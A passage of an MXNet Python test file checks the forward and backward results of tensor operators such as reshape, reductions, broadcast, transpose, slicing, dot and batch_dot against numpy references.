'Holdout Src Shape = %s, Shape Arguments = %s, Reverse = %s, Dst Shape = %s, ' \
'Output Shape = %s' %(str(holdout_src_shape), str(shape_args), str(reverse),
str(dst_shape), str(output_shape[0]))
def test_reshape_old():
net = mx.sym.Variable("data")
net = mx.sym.Reshape(net, target_shape=(2, 0))
js = net.tojson()
net = mx.sym.fromjson(js)
_, output_shape, __ = net.infer_shape(data=(2, 3, 5, 5))
assert(output_shape[0] == (2, 75))
# Test for Flatten
data = mx.sym.Variable("data")
net = mx.sym.Flatten(data)
exe = net._simple_bind(ctx=default_context(), data=(5, 4, 3, 7))
data_npy = np.random.normal(size=(5, 4, 3, 7))
out_grad_npy = np.random.normal(size=(5, 4 * 3 * 7))
outputs = exe.forward(is_train=True, data=data_npy)[0].asnumpy()
assert_allclose(outputs, data_npy.reshape((5, 4 * 3 * 7)))
exe.backward(out_grads=[mx.nd.array(out_grad_npy, ctx=default_context())])
assert_allclose(exe.grad_arrays[0].asnumpy(), out_grad_npy.reshape((5, 4, 3, 7)))
def test_reshape_like():
def test_reshape_like_new(lhs_shape, rhs_shape, lbeg, lend, rbeg, rend, dst_shape):
lhs = mx.sym.Variable("lhs")
rhs = mx.sym.Variable("rhs")
net = mx.sym.reshape_like(lhs, rhs, lhs_begin=lbeg, lhs_end=lend, rhs_begin=rbeg, rhs_end=rend)
js = net.tojson()
net = mx.sym.fromjson(js)
_, output_shape, __ = net.infer_shape(lhs=lhs_shape, rhs=rhs_shape)
assert output_shape[0] == dst_shape, \
'LHS Shape = %s, RHS Shape = %s, lhs_begin = %s, lhs_end = %s, rhs_begin= %s, rhs_end= %s'\
%(str(lhs_shape), str(rhs_shape), str(lbeg), str(lend), str(rbeg), str(rend))
lhs_npy = np.random.rand(*lhs_shape)
rhs_npy = np.random.rand(*rhs_shape)
grad_npy = np.random.rand(*dst_shape)
exe = net._simple_bind(default_context(), lhs=lhs_shape, rhs=rhs_shape)
exe.arg_dict['lhs'][:] = lhs_npy
exe.arg_dict['rhs'][:] = rhs_npy
exe.forward(is_train=True)
assert np.square(exe.outputs[0].asnumpy() - lhs_npy.reshape(dst_shape)).mean() < 1E-7, \
'LHS Shape = %s, RHS Shape = %s, lhs_begin = %s, lhs_end = %s, rhs_begin= %s, rhs_end= %s'\
%(str(lhs_shape), str(rhs_shape), str(lbeg), str(lend), str(rbeg), str(rend))
exe.backward(out_grads=mx.nd.array(grad_npy))
assert np.square(exe.grad_dict['lhs'].asnumpy() - grad_npy.reshape(lhs_shape)).mean() < 1E-7, \
'LHS Shape = %s, RHS Shape = %s, lhs_begin = %s, lhs_end = %s, rhs_begin= %s, rhs_end= %s'\
%(str(lhs_shape), str(rhs_shape), str(lbeg), str(lend), str(rbeg), str(rend))
# Test new api (Using shape)
test_cases = [
[(30,), (15,2,4), 0, None, 0, 2, (15,2)],
[(30,), (15,2,4), None, 1, None, 2, (15,2)],
[(30,7), (15,2,4), 0, 1, 0, 2, (15,2,7)],
[(3,5), (1,15,4), 0, 2, 1, 2, (15,)],
[(3,5), (1,15,4), 0, None, 1, -1, (15,)],
[(30,12), (4,2,2,3), -1, None, 1, None, (30,2,2,3)],
[(1,1,7,3,1,1), (81,1,1,21), 1, -1, 1, None, (1,1,1,21,1)]
]
for test_case in test_cases:
test_reshape_like_new(*test_case)
# Test old api
lhs = mx.sym.Variable("lhs")
rhs = mx.sym.Variable("rhs")
net = mx.sym.reshape_like(lhs, rhs)
js = net.tojson()
net = mx.sym.fromjson(js)
_, output_shape, __ = net.infer_shape(lhs=(40, 30), rhs=(30,20,2))
assert(output_shape[0] == (30,20,2))
def test_reduce():
sample_num = 500
def test_reduce_inner(numpy_reduce_func, numpy_reduce_grad_func, mx_reduce_sym, nan_prob=0,
test_exclude=True, test_none_axis=False):
for i in range(sample_num):
            # Generate random data with ndim between 1 and 5 and every shape dim between 1 and 5
# Insert a NaN with probability equal to nan_prob
ndim = np.random.randint(1, 6)
shape = np.random.randint(1, 6, size=(ndim,))
axis_num = np.random.randint(0, ndim, size=1)
axis_flags = np.random.randint(0, 2, size=ndim)
if test_exclude:
exclude = np.random.randint(0, 2)
else:
exclude = False
axes = []
for (axis, flag) in enumerate(axis_flags):
if flag:
axes.append(axis)
if 0 == len(axes):
axes = None
elif 1 == len(axes):
axes = axes[0]
else:
axes = tuple(axes)
keepdims = np.random.randint(0, 2)
a = mx.symbol.Variable('a')
if axes is None:
if test_none_axis:
b = mx_reduce_sym(a, keepdims=keepdims, axis=axes)
else:
b = mx_reduce_sym(a, keepdims=keepdims)
elif exclude and isinstance(axes, tuple) and len(axes) < ndim:
naxes = [i for i in range(ndim) if i not in axes]
b = mx_reduce_sym(a, axis=naxes, keepdims=keepdims, exclude=True)
else:
b = mx_reduce_sym(a, axis=axes, keepdims=keepdims)
dat_npy = np.random.rand(*shape)
# Test with both negative and positive values (randomly). Avoid having both in the same
# test, which can be problematic for error checking due to near-zero values.
if np.random.rand() > 0.5:
dat_npy = -dat_npy
if nan_prob > 0:
dat_npy[np.random.rand(*shape) < nan_prob] = np.nan
sum_groundtruth = np.array(numpy_reduce_func(dat_npy, axis=axes, keepdims=keepdims))
if sum_groundtruth.shape == ():
sum_groundtruth = np.array([sum_groundtruth])
grad_nd = mx.nd.empty(shape)
outgrad_npy = np.array(np.random.rand(*sum_groundtruth.shape))
keepdim_shape = np_reduce(dat_npy, axes, 1, np.sum).shape
grad_groundtruth = numpy_reduce_grad_func(outgrad=outgrad_npy, data=dat_npy,
outdata=sum_groundtruth,
axis=axes, keepdims=keepdims,
keepdim_shape=keepdim_shape)
net = b._bind(default_context(), args={'a': mx.nd.array(dat_npy)},
args_grad={'a': grad_nd})
net.forward(is_train=True)
# check forward
assert_almost_equal_ignore_nan(net.outputs[0].asnumpy(), sum_groundtruth, rtol=1e-4, atol=1e-4)
net.backward(out_grads=mx.nd.array(outgrad_npy))
bc_grad_groundtruth = np.broadcast_to(grad_groundtruth, grad_nd.shape)
# check backward
assert_almost_equal_ignore_nan(grad_nd.asnumpy(), bc_grad_groundtruth, rtol=1e-4, atol=1e-4)
test_none_axis = [True, False]
for test_none in test_none_axis:
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.sum),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape),
mx.symbol.sum, test_none_axis=test_none)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.mean),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape)/(data.size/outdata.size),
mx.symbol.mean, test_none_axis=test_none)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.prod),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape) * (outdata.reshape(keepdim_shape) / data),
mx.symbol.prod, test_none_axis=test_none)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.nansum),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
np.where(np.isnan(data), 0, outgrad.reshape(keepdim_shape)),
mx.symbol.nansum, 0.3, test_none_axis=test_none)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.nanprod),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
np.where(np.isnan(data), 0, outgrad.reshape(keepdim_shape) *
(outdata.reshape(keepdim_shape) / data)),
mx.symbol.nanprod, 0.3, test_none_axis=test_none)
# grad of max and min are sensitive to the precision of the calculation.
# Force numpy to match mxnet's float32.
test_reduce_inner(lambda data, axis, keepdims:np_reduce(np.float32(data), axis, keepdims, np.max),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape) *
(np.equal(np.float32(data), outdata.reshape(keepdim_shape))),
mx.symbol.max)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(np.float32(data), axis, keepdims, np.min),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape) *
(np.equal(np.float32(data), outdata.reshape(keepdim_shape))),
mx.symbol.min)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.linalg.norm),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape) * (data / outdata.reshape(keepdim_shape)),
mx.symbol.norm, test_exclude=False, test_none_axis=test_none)
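# broadcast_axis / broadcast_to / broadcast_like are checked on random shapes with a
# random subset of axes collapsed to 1. Forward must reproduce the input broadcast to
# the target shape; backward must sum the output gradient over the broadcast axes.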
def test_broadcast():
sample_num = 200
for i in range(sample_num):
        # Generate random data with ndim between 1 and 5 and every shape dim between 1 and 5
ndim = np.random.randint(1, 6)
target_shape = np.random.randint(1, 6, size=(ndim,))
axis = tuple(set(np.random.randint(0, ndim, np.random.randint(1, ndim + 1))))
shape = target_shape.copy()
size = tuple([shape[ele] for ele in axis])
for ele in axis:
shape[ele] = 1
target_shape_with_zero = list(target_shape)
for idx in range(len(target_shape_with_zero)):
if idx not in axis:
target_shape_with_zero[idx] = 0
break
a = mx.symbol.Variable('a')
sym_bcast_axis = mx.symbol.broadcast_axis(a, axis=axis, size=size)
sym_bcast_to = mx.symbol.broadcast_to(a, shape=tuple(target_shape))
sym_bcast_to_with_zero = mx.symbol.broadcast_to(a, shape=tuple(target_shape_with_zero))
sym_bcast_like = mx.symbol.broadcast_like(a, sym_bcast_to)
def test_broadcasting_ele(sym_bcast):
dat_npy = np.random.rand(*shape)
groundtruth = dat_npy
grad_nd = mx.nd.empty(shape)
outgrad_npy = np.random.rand(*target_shape)
grad_groundtruth = np_reduce(outgrad_npy, axis=axis, keepdims=True,
numpy_reduce_func=np.sum)
net = sym_bcast._bind(default_context(), args={'a': mx.nd.array(dat_npy)},
args_grad={'a': grad_nd})
net.forward(is_train=True)
assert (net.outputs[0].shape == target_shape).all()
assert_almost_equal(net.outputs[0], groundtruth, rtol=1e-4)
net.backward(out_grads=mx.nd.array(outgrad_npy))
assert_almost_equal(grad_nd, grad_groundtruth, rtol=1e-4)
test_broadcasting_ele(sym_bcast_axis)
test_broadcasting_ele(sym_bcast_to)
test_broadcasting_ele(sym_bcast_to_with_zero)
test_broadcasting_ele(sym_bcast_like)
def test_transpose():
for ndim in range(1, 10):
for t in range(5):
dims = list(np.random.randint(1, 5, size=ndim))
axes = list(range(ndim))
random.shuffle(axes)
axes = tuple(axes)
x = mx.nd.array(np.random.normal(size=dims))
y = mx.nd.transpose(x, axes=axes)
assert_allclose(np.transpose(x.asnumpy(), axes=axes), y.asnumpy())
y = mx.nd.transpose(x)
assert_allclose(np.transpose(x.asnumpy()), y.asnumpy())
@pytest.mark.serial
def test_pseudo2dtranspose():
    def getTwoInts(low, high):
        n1 = np.random.randint(low, high)
        n2 = np.random.randint(low, high - 1)
        n2 = n2 if n2 < n1 else n2 + 1
        return tuple(np.sort([n1, n2]))
def getTranspAxes(ndim):
axes = list(range(ndim))
n1, n2 = getTwoInts(0,ndim)
return tuple(axes[:n1]+axes[n2:]+axes[n1:n2])
for ndim in range(2, 7):
for dt in ['int8', 'half', 'int32', 'int64']:
for _ in range(5):
dims = list(np.random.randint(5, 20, size=ndim))
axes = getTranspAxes(ndim)
x = mx.nd.array(np.random.normal(size=dims), dtype=dt)
y = mx.nd.transpose(x, axes=axes)
assert_allclose(np.transpose(x.asnumpy(), axes=axes), y.asnumpy())
@pytest.mark.serial
def test_big_transpose():
n = [1]
d = list(np.random.randint(132, 160, size=1))
hw = list(np.random.randint(256, 320, size=2))
c = [10]
dims = n + d + hw + c
axes = (0,4,1,2,3)
x_np = np.random.normal(size=dims).astype('uint8')
x = mx.nd.array(x_np, dtype='uint8')
y = mx.nd.transpose(x, axes=axes)
assert_allclose(np.transpose(x_np, axes=axes), y.asnumpy().astype('uint8'))
axes = (0,2,3,4,1)
z = mx.nd.transpose(y, axes=axes)
assert_allclose(x_np, z.asnumpy().astype('uint8'))
@pytest.mark.serial
def test_larger_transpose():
x = mx.nd.random.normal(shape=(50,51))
y = mx.nd.transpose(x)
assert_allclose(np.transpose(x.asnumpy()), y.asnumpy())
def test_expand_dims():
for ndim in range(1, 6):
for axis in range(-ndim + 1, ndim):
x = np.random.normal(size=list(np.random.randint(1, 10, size=ndim)))
y = mx.nd.array(x)
x1 = np.expand_dims(x, axis=axis)
y1 = mx.nd.expand_dims(y, axis=axis)
assert_allclose(x1, y1.asnumpy())
assert_allclose(x1.shape, y1.shape)
def test_crop():
for ndim in range(1, 6):
for t in range(5):
dims = []
begin = []
end = []
idx = []
for i in range(ndim):
d = random.randint(1, 5)
b = random.randint(0, d-1)
e = random.randint(b+1, d)
if b == 0 and random.randint(0, 1):
b = None
elif b != 0 and random.randint(0, 1):
b -= d
if e == d and random.randint(0, 1):
e = None
elif e != d and random.randint(0, 1):
e -= d
dims.append(d)
begin.append(b)
end.append(e)
idx.append(slice(b, e))
x = mx.nd.array(np.random.normal(size=dims))
y = mx.nd.crop(x, begin=tuple(begin), end=tuple(end))
assert_allclose(x.asnumpy()[idx], y.asnumpy())
vx = mx.sym.Variable('x')
vy = mx.sym.crop(vx, begin=tuple(begin), end=tuple(end))
check_numeric_gradient(vy, [x.asnumpy()])
def test_slice_axis():
for ndim in range(1, 6):
shape = np.random.randint(1, 11, size=(ndim,))
for t in range(ndim):
d = shape[t]
b = random.randint(0, d-1)
e = random.randint(b+1, d)
if np.random.rand() > 0.6:
e = None
else:
if e < d and np.random.rand() > 0.5:
e = e - d
if np.random.rand() > 0.5:
b = b - d
idx = []
for i in range(ndim):
idx.append(slice(0, shape[i]))
idx[t] = slice(b, e)
X = mx.symbol.Variable('X')
x = mx.nd.array(np.random.normal(size=shape))
Y = mx.symbol.slice_axis(data=X, axis=t, begin=b, end=e)
xgrad = mx.nd.empty(x.shape)
exec1 = Y._bind(default_context(), args = [x], args_grad = {'X': xgrad})
exec1.forward(is_train=True)
y = exec1.outputs[0]
assert_allclose(x.asnumpy()[idx], y.asnumpy())
exec1.backward([y])
xx = x.asnumpy()
xx[:] = 0.0
xx[idx] = x.asnumpy()[idx]
assert_allclose(xx, xgrad.asnumpy())
x_grad_npy = np.random.normal(size=x.shape)
xgrad = mx.nd.array(x_grad_npy)
exec2 = Y._bind(default_context(), args=[x], args_grad={'X': xgrad}, grad_req="add")
exec2.forward(is_train=True)
exec2.backward([exec2.outputs[0]])
xx = np.zeros(shape=x.shape, dtype=np.float32)
xx[idx] = x.asnumpy()[idx]
assert_allclose(xx + x_grad_npy, xgrad.asnumpy(), atol=1E-5)
def test_slice_like():
for ndim in range(1, 6):
from_shape = np.random.randint(1, 11, size=(ndim,))
shape = [s + np.random.randint(0, 3) for s in from_shape]
for t in range(ndim):
if t > 0:
axes = np.random.randint(0, ndim, size=t).tolist()
else:
axes = []
idx = []
for i in range(ndim):
idx.append(slice(0, shape[i]))
if i in axes or not axes:
idx[i] = slice(0, from_shape[i])
if axes:
pos = np.random.randint(0, t)
if axes[pos] > 0:
axes[pos] -= ndim # negative index
X = mx.symbol.Variable('X')
X_1 = mx.symbol.Variable('X1')
x = mx.nd.array(np.random.normal(size=shape))
x1 = mx.nd.array(np.random.normal(size=from_shape))
Y = mx.symbol.slice_like(data=X, shape_like=X_1, axes=axes)
xgrad = mx.nd.empty(x.shape)
xgrad1 = mx.nd.empty(x1.shape)
exec1 = Y._bind(default_context(), args = [x, x1],
args_grad = {'X': xgrad, 'X1': xgrad1})
exec1.forward(is_train=True)
y = exec1.outputs[0]
assert_allclose(x.asnumpy()[idx], y.asnumpy())
exec1.backward([y])
xx = x.asnumpy()
xx[:] = 0.0
xx[idx] = x.asnumpy()[idx]
assert_allclose(xx, xgrad.asnumpy())
assert_allclose(xgrad1.asnumpy(), mx.nd.zeros_like(xgrad1).asnumpy())
def test_slice_like_different_types():
x = [[ 1., 2., 3., 4.],
[ 5., 6., 7., 8.],
[ 9., 10., 11., 12.]]
y = [[ 0., 0., 0.],
[ 0., 0., 0.]]
x = mx.nd.array(x)
y = mx.nd.array(y).astype('int32')
z = mx.nd.slice_like(x, y)
assert_allclose(z.asnumpy(), [[1,2,3],[5,6,7]])
def test_reshape_like_different_types():
x = mx.nd.zeros((2, 3))
y = mx.nd.array([[1, 2], [3, 4], [5, 6]])
y = mx.nd.array(y).astype('int32')
z = mx.nd.reshape_like(x, y)
assert_allclose(z.asnumpy(), [[0,0],[0,0],[0,0]])
def test_broadcast_like_different_types():
x = mx.nd.zeros((2, 1))
y = mx.nd.ones((2, 2))
y = mx.nd.array(y).astype('int32')
z = mx.nd.broadcast_like(x, y)
assert_allclose(z.asnumpy(), [[0,0],[0,0]])
assert x.dtype == z.dtype
def test_flip():
for ndim in range(1, 6):
for t in range(5):
dims = [random.randint(1,10) for i in range(ndim)]
axis = random.randint(0, ndim-1)
idx = [slice(None, None, -1) if i == axis else slice(None, None) for i in range(ndim)]
x = mx.nd.array(np.random.normal(size=dims))
y = mx.nd.flip(x, axis=axis)
assert_allclose(x.asnumpy()[idx], y.asnumpy())
def test_stn():
import sys
np.set_printoptions(threshold=sys.maxsize)
num_filter = 2 # conv of loc net
kernel = (3, 3) # conv of loc net
num_hidden = 6 # fc of loc net
for n in [1, 2, 3, 4]:
for c in [1, 2, 3, 4]:
            for h in [5, 9, 13, 17]: # for convenience of testing, the third and fourth input dims should be 4x + 1
for w in [5, 9, 13, 17]:
data_shape = (n, c, h, w)
target_shape = (int((data_shape[2]+1)/2), int((data_shape[3]+1)/2))
data = mx.sym.Variable(name="data")
loc = mx.sym.Convolution(data=data, kernel=kernel, pad=(1, 1), num_filter=num_filter, name="loc_conv")
loc = mx.sym.Flatten(data=loc)
loc = mx.sym.FullyConnected(data=loc, num_hidden=num_hidden, name="loc_fc")
stn = mx.sym.SpatialTransformer(data=data, loc=loc, target_shape=target_shape,
transform_type="affine", sampler_type="bilinear")
arg_names = stn.list_arguments()
arg_shapes, out_shapes, _ = stn.infer_shape(data=data_shape)
# check shape
assert out_shapes[0] == (data_shape[0], data_shape[1], target_shape[0], target_shape[1])
dev = default_context()
#dev = mx.gpu(0)
args = {}
args['data'] = mx.random.normal(0, 1, data_shape, ctx=mx.cpu()).copyto(dev)
args['loc_conv_weight'] = mx.nd.zeros((num_filter, data_shape[1], kernel[0], kernel[1]), ctx=dev)
args['loc_conv_bias'] = mx.nd.zeros((num_filter,), ctx=dev)
args['loc_fc_weight'] = mx.nd.zeros((6, num_filter*data_shape[2]*data_shape[3]), ctx=dev)
args['loc_fc_bias'] = mx.nd.array([0.5, 0, 0, 0, 0.5, 0], ctx=dev)
grad_grad = [mx.nd.zeros(shape, ctx=dev) for shape in arg_shapes]
exe = stn._bind(dev, args=args, args_grad=grad_grad)
exe.forward(is_train=True)
out = exe.outputs[0]
# check forward
assert_almost_equal(out, args['data'].asnumpy()[:, :, h//4:h-h//4, w//4:w-w//4], rtol=1e-2, atol=1e-4)
out_grad = mx.nd.ones(out.shape, ctx=dev)
exe.backward([out_grad])
# check backward
assert_almost_equal(out_grad, grad_grad[0].asnumpy()[:, :, h//4:h-h//4, w//4:w-w//4], rtol=1e-2, atol=1e-4)
def test_stn_valid_sampling():
target_shape = (
28,
28,
)
src_shape = (
42,
42,
)
data = mx.sym.Variable(name="data")
loc = mx.sym.Variable(name="loc")
data_array = np.zeros((
1,
1,
) + src_shape)
# Have an ever so slight rotation.
loc_array = np.array(
[[9.03887e-05, 1.00015, 0.00174931, 1.0003, 0.000311901,
-0.000919065]])
stn = mx.sym.SpatialTransformer(
data=data,
loc=loc,
target_shape=target_shape,
transform_type="affine",
sampler_type="bilinear")
grad_req = {k: 'write' for k in stn.list_arguments()}
grads = {
'data': mx.nd.array(np.zeros_like(data_array)),
'loc': mx.nd.array(np.zeros_like(loc_array))
}
executor = stn._bind(
ctx=default_context(),
args={'data': mx.nd.array(data_array),
'loc': mx.nd.array(loc_array)},
grad_req=grad_req,
args_grad=grads)
executor.forward(is_train=True)
executor.backward(mx.nd.ones((
1,
1,
) + target_shape))
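# dot is checked against numpy ground truth for the forward output and both input
# gradients over small m, k, n, then the transpose_a / transpose_b variants are covered
# by numeric gradient checks. float16 (and 1-D inputs) are only exercised on GPU, with
# looser tolerances.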
def test_dot():
ctx = default_context()
dtypes = ['float32', 'float64']
ndims = [2]
if ctx.device_type == 'gpu':
dtypes += ['float16']
ndims += [1]
# Test normal dot.
for ndim in ndims:
for data_type in dtypes:
tol = 1e-2 if data_type == 'float16' else 1e-3
for m in range(1, 5):
for k in range(1, 5):
if ndim == 1 and k != 1:
pass
for n in range(1, 5):
a_shape = (m, k) if ndim == 2 else (m,)
b_shape = (k, n) if ndim == 2 else (n,)
a_npy = np.random.normal(0, 1, (m, k))
a_npy = a_npy.astype(data_type)
b_npy = np.random.normal(0, 1, (k, n))
b_npy = b_npy.astype(data_type)
c_npy = np.empty((m, n), dtype=data_type)
ograd_npy = np.random.normal(0, 1, (m, n))
ograd_npy = ograd_npy.astype(data_type)
agrad_npy = np.empty((m, k), dtype=data_type)
bgrad_npy = np.empty((k, n), dtype=data_type)
c_npy[:, :] = np.dot(a_npy[:, :], b_npy[:, :])
bgrad_npy[:, :] = np.dot(a_npy[:, :].T, ograd_npy[:, :])
agrad_npy[:, :] = np.dot(ograd_npy[:, :], b_npy[:, :].T)
a = mx.sym.Variable('a', dtype=data_type)
b = mx.sym.Variable('b', dtype=data_type)
c = mx.sym.dot(a, b)
exe = c._simple_bind(ctx=ctx, a=a_npy.shape, b=b_npy.shape)
outputs = exe.forward(is_train=True, a=a_npy, b=b_npy)
assert_almost_equal(outputs[0], c_npy, rtol=tol, atol=tol)
exe.backward(out_grads=[mx.nd.array(ograd_npy, mx.cpu()).astype(data_type)])
assert_almost_equal(exe.grad_dict['a'], agrad_npy, rtol=tol, atol=tol)
assert_almost_equal(exe.grad_dict['b'], bgrad_npy, rtol=tol, atol=tol)
# Test dot with transpose flag using gradient checker.
def dot_sym(data_type):
x = mx.sym.Variable('x', dtype=data_type)
y = mx.sym.Variable('y', dtype=data_type)
return mx.sym.dot(x, y)
def dot_sym_xT(data_type):
x = mx.sym.Variable('x', dtype=data_type)
y = mx.sym.Variable('y', dtype=data_type)
return mx.sym.dot(x, y, transpose_a=True)
def dot_sym_yT(data_type):
x = mx.sym.Variable('x', dtype=data_type)
y = mx.sym.Variable('y', dtype=data_type)
return mx.sym.dot(x, y, transpose_b=True)
def dot_sym_xT_yT(data_type):
x = mx.sym.Variable('x', dtype=data_type)
y = mx.sym.Variable('y', dtype=data_type)
return mx.sym.dot(x, y, transpose_a=True, transpose_b=True)
for data_type in dtypes:
for ashape, bshape in [((3, 4), (4, 5)), ((2, 3, 4), (4, 5, 6))]:
m1_npy = np.random.uniform(-1, 1, ashape)
m1_npy = m1_npy.astype(data_type)
m2_npy = np.random.uniform(-1, 1, bshape)
m2_npy = m2_npy.astype(data_type)
check_numeric_gradient(dot_sym(data_type), [m1_npy, m2_npy], numeric_eps=1e-1, rtol=2e-2, atol=1e-3)
check_numeric_gradient(dot_sym_xT(data_type), [m1_npy.T, m2_npy], numeric_eps=1e-1, rtol=2e-2, atol=1e-3)
check_numeric_gradient(dot_sym_yT(data_type), [m1_npy, m2_npy.T], numeric_eps=1e-1, rtol=2e-2, atol=1e-3)
check_numeric_gradient(dot_sym_xT_yT(data_type), [m1_npy.T, m2_npy.T], numeric_eps=1e-1, rtol=2e-2, atol=1e-3)
def test_batch_dot():
ctx = default_context()
dtypes = ['float32', 'float64']
if ctx.device_type == 'gpu':
dtypes += ['float16']
for data_type in dtypes:
for batch_size in range(1, 5):
for m in range(1, 5):
for k in range(1, 5):
for n in range(1, 5):
transpose_a = (np.random.rand() > 0.5)
transpose_b = (np.random.rand() > 0.5)
a_npy = np.random.normal(0, 1, (batch_size, m, k))
a_npy = a_npy.astype(data_type)
b_npy = np.random.normal(0, 1, (batch_size, k, n))
b_npy = b_npy.astype(data_type)
c_npy = np.empty((batch_size, m, n), dtype=data_type)
ograd_npy = np.random.normal(0, 1, (batch_size, m, n))
ograd_npy = ograd_npy.astype(data_type)
agrad_npy = np.empty((batch_size, m, k), dtype=data_type)
bgrad_npy = np.empty((batch_size, k, n), dtype=data_type)
a_init_grad_npy = np.random.normal(size=(batch_size, m, k))
a_init_grad_npy = a_init_grad_npy.astype(data_type)
b_init_grad_npy = np.random.normal(size=(batch_size, k, n))
b_init_grad_npy = b_init_grad_npy.astype(data_type)
for i in range(batch_size):
c_npy[i, :, :] = np.dot(a_npy[i, :, :], b_npy[i, :, :])
bgrad_npy[i, :, :] = np.dot(a_npy[i, :, :].T, ograd_npy[i, :, :])
agrad_npy[i, :, :] = np.dot(ograd_npy[i, :, :], b_npy[i, :, :].T)
a = mx.sym.Variable('a', dtype=data_type)
b = mx.sym.Variable('b', dtype=data_type)
c = mx.sym.batch_dot(a, b, transpose_a=transpose_a, transpose_b=transpose_b)
if transpose_a:
a_npy = np.transpose(a_npy, axes=(0, 2, 1))
agrad_npy = np.transpose(agrad_npy, axes=(0, 2, 1))
a_init_grad_npy = np.transpose(a_init_grad_npy, axes=(0, 2, 1))
if transpose_b:
b_npy = np.transpose(b_npy, axes=(0, 2, 1))
bgrad_npy = np.transpose(bgrad_npy, axes=(0, 2, 1))
b_init_grad_npy = np.transpose(b_init_grad_npy, axes=(0, 2, 1))
exe = c._simple_bind(ctx=ctx,
a=a_npy.shape, b=b_npy.shape, grad_req='write')
exe_add = c._simple_bind(ctx=ctx,
a=a_npy.shape, b=b_npy.shape, grad_req='add')
exe_add.grad_dict['a'][:] = a_init_grad_npy
exe_add.grad_dict['b'][:] = b_init_grad_npy
outputs = exe.forward(is_train=True, a=a_npy, b=b_npy)
assert_almost_equal(outputs[0], c_npy,
rtol=1e-2 if data_type == 'float16' else 1e-3,
atol=1e-2 if data_type == 'float16' else 1e-4)
exe.backward(out_grads=[mx.nd.array(ograd_npy, dtype=outputs[0].dtype, ctx=exe._ctx)])
assert_almost_equal(exe.grad_dict['a'], agrad_npy,
rtol=1e-2 if data_type == 'float16' else 1e-3,
atol=1e-2 if data_type == 'float16' else 1e-4)
assert_almost_equal(exe.grad_dict['b'], bgrad_npy,
rtol=1e-2 if data_type == 'float16' else 1e-3,
atol=1e-2 if data_type == 'float16' else 1e-4)
exe_add.forward(is_train=True, a=a_npy, b=b_npy)
exe_add.backward(out_grads=[mx.nd.array(ograd_npy, dtype=exe_add.outputs[0].dtype, ctx=exe._ctx)])
assert_almost_equal(exe_add.grad_dict['a'],
agrad_npy + a_init_grad_npy,
rtol=1e-2 if data_type == 'float16' else 1e-3,
atol=1e-2 if data_type == 'float16' else 1e-4)
assert_almost_equal(exe_add.grad_dict['b'],
bgrad_npy + b_init_grad_npy,
rtol=1e-2 if data_type == 'float16' else 1e-3,
atol=1e-2 if data_type == 'float16' else 1e-4)
def get_correlation(data1,data2,kernel_size,max_displacement,stride1,stride2,pad_size,is_multiply):
img1 = mx.sym.Variable('img1')
img2 = mx.sym.Variable('img2')
return mx.sym.Correlation(data1=img1,data2=img2,kernel_size =kernel_size,max_displacement = max_displacement,
stride1 = stride1,stride2 = stride2,pad_size= pad_size,is_multiply = is_multiply)
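# Numpy reference for the Correlation op. The output spatial size is
#   top_width = (W + 2*pad_size - 2*(max_displacement + (kernel_size-1)//2)) // stride1
# and the channel count is (2*(max_displacement//stride2) + 1)**2. For example, data
# (5, 1, 15, 15) with kernel_size=1, max_displacement=5, stride1=stride2=1, pad_size=5
# gives top_width = (25 - 10) // 1 = 15 and 11*11 = 121 channels, i.e. an output of
# shape (5, 121, 15, 15).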
def correlation_forward(data1,data2,pad_size,kernel_size,stride1,stride2,max_displacement,is_multiply):
# compute output's dimension
paddedbottomheight = data1.shape[2] + 2 * pad_size
paddedbottomwidth = data1.shape[3] + 2 * pad_size
kernel_radius = (kernel_size - 1) // 2
border_size = max_displacement + kernel_radius
top_width = (paddedbottomwidth - border_size * 2) // stride1
top_height = (paddedbottomheight - border_size * 2) // stride1
neighborhood_grid_radius = max_displacement // stride2
neighborhood_grid_width = neighborhood_grid_radius * 2 + 1
top_channels = neighborhood_grid_width * neighborhood_grid_width
out = np.zeros((data1.shape[0], top_channels, top_height, top_width))
tmp1 = np.zeros((data1.shape[0],data1.shape[1],paddedbottomheight, paddedbottomwidth))
tmp2 = np.zeros((data1.shape[0],data1.shape[1],paddedbottomheight, paddedbottomwidth))
tmp1[:, :, pad_size:pad_size + data1.shape[2], pad_size:pad_size + data1.shape[3]] = data1[:,:,:,:]
tmp2[:, :, pad_size:pad_size + data2.shape[2], pad_size:pad_size + data2.shape[3]] = data2[:,:,:,:]
for i in range(top_height):
for j in range(top_width):
for nbatch in range(data1.shape[0]):
                # x1, y1 is the location in data1; i, j is the location in the output
x1 = j * stride1 + max_displacement
y1 = i * stride1 + max_displacement
for top_channel in range(top_channels):
s2o = (top_channel % neighborhood_grid_width - neighborhood_grid_radius) * stride2
s2p = (top_channel // neighborhood_grid_width - neighborhood_grid_radius) * stride2
# location in data2
x2 = x1 + s2o
y2 = y1 + s2p
for h in range(kernel_size):
for w in range(kernel_size):
for channel in range(data1.shape[1]):
if is_multiply:
out[nbatch, top_channel, i, j] += tmp1[nbatch, channel,y1 + h, x1 + w] * tmp2[nbatch, channel, y2 + h,x2 + w]
else:
out[nbatch, top_channel, i, j] += abs(tmp1[nbatch, channel, y1 + h, x1 + w] - tmp2[nbatch, channel, y2 + h, x2 + w])
out /= float(kernel_size**2*data1.shape[1])
return out,tmp1,tmp2
def correlation_backward(out_grad,tmp1,tmp2,data1,data2,pad_size,kernel_size,stride1,stride2,max_displacement,is_multiply):
# compute output's dimension
paddedbottomheight = data1.shape[2] + 2 * pad_size
